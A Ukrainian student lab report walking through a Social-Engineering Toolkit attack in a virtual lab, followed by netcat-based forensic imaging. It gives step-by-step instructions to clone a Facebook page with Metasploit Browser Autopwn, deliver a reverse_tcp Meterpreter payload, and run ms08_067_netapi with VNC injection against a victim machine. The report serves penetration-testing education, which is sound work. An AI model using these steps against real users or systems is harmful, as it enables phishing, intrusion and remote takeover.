МІНІСТЕРСТВО ОСВІТИ І НАУКИ УКРАЇНИ
НАЦІОНАЛЬНИЙ УНІВЕРСИТЕТ ”ЛЬВІВСЬКА ПОЛІТЕХНІКА”
ІКТА
кафедра захисту інформації
ЗВІТ
до лабораторної роботи № 5
з курсу
«Методи та засоби захисту інформації в комп'ютерних мережах»
на тему
«Соціал-інжиніринг Toolkit. Create Malicious Weblink, Install Virus, Capture Forensic Images»
МЕТА РОБОТИ:
Створення шкідливого веб-посилання, віддаленого встановлення вірусу та копіювання образу диску.
КОРОТКІ ТЕОРЕТИЧНІ ВІДОМОСТІ:
Що таке Social-Engineering Toolkit (SET)
The Social-Engineering Toolkit (SET) є пітон керований набір користувальницьких інструментів, які виключно зосереджені на тестування на проникнення людського атакуючого фактора.
Його головна мета це збільшення і моделювання соціально-інженерної атаки і дозволяє тестувати і ефективно перевірити, які цільові атаки можуть бути розвинені.
Social-Engineering toolkit доступні на backtrack like на backtrack 5, backbox, blackbuntu, Gnacktrack та на інших Linux збірках, які використовуються для тестування на проникнення.
Лабораторні примітки
У цій лабораторній ми зробимо наступне:
Використуємо набір для створення шкідливих Web-Link
Створимо доповнення до VNC сесії
Встановимо шкідливі віруси
Захоплення судової пам'яті і образу жорсткого диска
ХІД РОБОТИ:
1. Запуск Social Engineering ToolKit
Запуск Social Engineering ToolKit
Інструкції:
cd /pentest/exploits/set
./set
Векторний сайт атаки
Інструкції:
Виберіть 2
3. Виберіть метод Metasploit Browser Attack
Інструкції:
Виберіть 2
4. Виберіть Web Templates
Інструкції:
Виберіть 1
5. Встановлення веб атаки на Facebook
Інструкції:
Виберіть 4
6. Введіть Exploit
Інструкції:
24) Metasploit Browser Autopwn (Використовуйте на свій ризик!!!)
7. Встановіть Payload
Інструкції:
Виберіть 2) Windows Reverse_TCP Meterpreter
Використовйте порт 5555
8. Підготовте проломи в роботі сервера
Інструкції:
Шукайте "--- Done, Found" перед продовженням.
2. Запуск WindowVulnerable01 і запуск Веб Браузера
Запуск Internet Explorer
Інструкції:
Start --> All Programs --> Internet Explorer
Жертва натискає на посилання
Інструкції:
Помістіть шкідливе Web Link в адресну строку браузера
В нашому випадку, http://192.168.1.105:8080
В вашому, візьміть ІР адресу з Частини 4, крок 8.
Примітки:
Веб браузер буде зломано.
3. Введення машини жертви
Запишіть ІР адресу жертви
Інструкції:
Запишіть ІР адресу жертви.
Знайдіть рядок, що починається з Session ID 1 (Дивись нижче).
Створення VNC Session на машині жертви
Інструкції:
use windows/smb/ms08_067_netapi
set PAYLOAD windows/vncinject/bind_tcp
set RHOST 192.168.1.109
Примітки: ІР адреса, отримана на попередньому рівні
exploit
Перегляд машини жертви по VNC
Інструкції:
Зараз ви маєте VNC підключення до машини жертви.
Все добре!!!
Захист лабораторної Інструкції №1:
Клацніть на Metasploit Courtesy Shell
date, введіть дату
echo "Your Name"
Заповніть рядок "Your Name" вашим іменем.
наприклад, echo "John Gray"
Заскрініть, PrtScn
Вставте в документ Word
Запустіть Internet Explorer
Інструкції:
Start --> Internet Explorer
Скачайте несправжній вірус.
Інструкції:
Вставте "http://www.computersecuritystudent.com/UNIX/BACKTRACK/lesson6/fake_virus.bat" в адресну строку.
Нажміть Ентер
Нажміть Зберегти
Збережіть несправжній вірус.
Інструкції:
Йдіть до "C:\tools\Virus Jar"
Створіть цю папку якщо її немає.
Нажміть Save
Запустіть несправжній вірус.
Інструкції:
Нажміть на кнопку Run
Перегляд результатів
Інструкції:
Ви побачите декілька повідомлень про те, ваша система була скомпрометована.
Зверніть увагу, що це всього лише пакетний сценарій, який виводить повідомлення на екран.
Це був просто приклад того, що зловмисник може зробити, як тільки зєднається з віддаленим комп'ютером жертви.
Натисніть на Black Box і натисніть Enter..
Видаліть fake_virus.bat file
Інструкції:
Start --> My Computer
Йдіть до "C:\tools\Virus Jar"
Нажміть праву кнопку мишки на fake_virus.bat
Нажміть Delete
Send to Recycle Bin? Yes
Видаліть fake_virus.bat файл з кошика
Інструкції:
Йдіть до Recycle Bin (кошик)
Нажміть на праву кнопку мишки на fake_virus.bat
Нажміть Delete
Are you sure want to delete 'fake_virus.bat'? Yes
Примітки:
Ми повністю видалити цей файл, тому ми повинні видалити файл з попередньої судової лабораторії..
4. Запуск NetCat Listener щоб отримати дамп фізичної пам'яті від Helix
Відкрийте консольний термінал
Інструкції:
Нажміть на консольний термінал
Візьміть ІР адресу
Інструкції:
ifconfig -a
Примітки:
Як зазначено нижче, наша ІР адреса 192.168.1.105.
Запишіть вашу ІР адресу.
Запустіть Netcat в BackTrack
Інструкції:
mkdir -p /FORENSICS/images/1/
cd /FORENSICS/images/1/
nc -l -vvv -p 8888 > WV01_PM_fake_virus.dd
Netcat буде очікувати доки Helix відправить образ пам'яті.
Ніщо не буде відправлено до завершення наступного розділу.
Переходьте до наступного розділу
5. Запустіть Helix для відправки фізичної пам’яті до BackTrack
Відредагуйте конфігурації віртуальної машини
Інструкції:
Virtual Machine --> Virtual Machine Settings...
Настройте Windows для загрузки Helix як образ CD/DVD
Інструкціїї:
Виберіть CD/DVD (IDE)
Виберіть Use ISO image file
Вкажіть де знаходиться Helix iso.
Примітки: У мому прикладі, він збережений за наступною адресою:
H:\BOOT ISO\Helix2008R1.iso
Helix екран
Інструкції:
Виберіть Accept
Запуск придбання
Інструкції:
Нажміть на значок камери.
Виберіть "\\PhysicalMemory" з випадаючого вікна
Виберіть кнопку NetCat
Призначення IP: Забезпечити BackTrack IP-адресу.
Отримати ІР адресу BackTrack в Частині 8, Крок 2.
В мому випадку це 192.168.1.105.
В вашому він буде відрізнятися від даного.
Port: 8888
Це порт NetCat на сервері BackTrack.
Нажміть Acquire
Зауваження
Інструкції:
Нажміть Yes
Helix інформаційний
Інструкції:
Ви побачите чорне вікно командного рядка, як показано нижче.
Зверніть увагу, він видасть "Copying Physical memory"
НЕ переходьте до наступного розділу, поки чорне вікно зникає
6. Перевірте Dump фізичної пам’яті в BackTrack
Перевірте розмір
Інструкції:
ls -l WV01_PM_fake_virus.dd
7. Запуск NetCat Listener, щоб отримати образ жорсткого диска від Helix
Запуск Netcat в BackTrack
Інструкції:
cd /FORENSICS/images/1/
nc -l -vvv -p 8888 > WV01_HD_fake_virus.dd
Netcat буде очікувати відправлення образу жорсткого диска від Helix.
Ніщо не буде відправлено до завершення в наступному розділі.
8. Використання Helix для відправлення образу жорсткого диску в BackTrack
Використання придбання
Інструкції:
Нажміть на значок камери.
Виберіть "C:\ (Logical drive)" з випливаючого меню
Виберіть кнопку NetCat
Призначення IP: Надання BackTrack IP адреси.
Отримати ІР адресу BackTrack IP в Частині 8, Крок 2.
У нашому прикладі це 192.168.1.105.
В вашому він буде відрізнятися.
Port: 8888
Це порт Listening NetCat на BackTrack сервері.
Нажміть Acquire
Зауваження
Інструкції:
Нажміть Yes
Helix інформаційний
Інструкції:
Ви побачите чорне вікно командного рядка, як показано нижче.
Зверніть увагу, він видасть "Copying \\.\C to CONOUT$..."
Це копіювання 8GB може зайняти близько 30 хвилин.
Не Переходьте до наступної частини доки чорне вікно не зникне
9. Перевірка образу жорсткого диска в BackTrack
Перевірка розміру образу
Інструкції:
ls -l WV01*
date
echo "Your Name"
Запомніть рядок "Your Name" вашим актуальним іменем.
наприклад, echo "John Gray"
Захист лабораторної. Інструкції #2:
Заскрініть
Вставте в Word документ
ВИСНОВОК:
Отримавши віддалений доступ до комп'ютера жертви за допомогою шкідливого веб-посилання завантажив вірус на ПК жертви та отримав образи дисків.